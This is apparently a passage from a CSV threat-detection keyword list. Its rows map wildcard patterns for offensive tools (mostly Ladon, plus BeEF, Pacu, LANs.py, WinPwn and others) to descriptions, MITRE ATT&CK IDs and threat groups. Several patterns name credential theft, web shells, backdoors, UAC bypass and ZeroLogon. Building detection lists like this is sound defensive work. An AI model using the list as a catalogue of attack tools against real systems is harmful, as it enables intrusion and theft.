loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon UdpServer*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon WebShell*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon whoami*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon WifiPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon wmiexec*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon WmiExec2 *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon XshellPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ZeroLogon*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon40 BypassUAC*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon911*.ps1,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon911.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon911_*.rar*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*LadonExp.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*LadonGUI.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*LadonLib.rar*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon-N20.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Ladon-N40.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - 
TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*LadonStudy.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Lalin.sh *,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,0,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -*lambda__backdoor_new_sec_groups*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*lan_fingerprint_common.*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*lan_ping_sweep.json*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*lan_sw_port_scan.json*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*lanjelot*,offensive_tool_keyword,Github Username,github username. 
creator of patator and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/lanjelot,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LANs.py*,offensive_tool_keyword,LANs.py,Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit,T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003,TA0007 - TA0006 - TA0003 - TA0002 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/DanMcInerney/LANs.py,1,1,N/A,N/A,10,2533,518,2021-07-31T21:33:37Z,2013-01-03T19:33:52Z -*lansearch.exe *,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*lansearchpro_portable.zip*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*lansearchpro_setup.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*laps_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*LapsAllowedAdminGroups.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
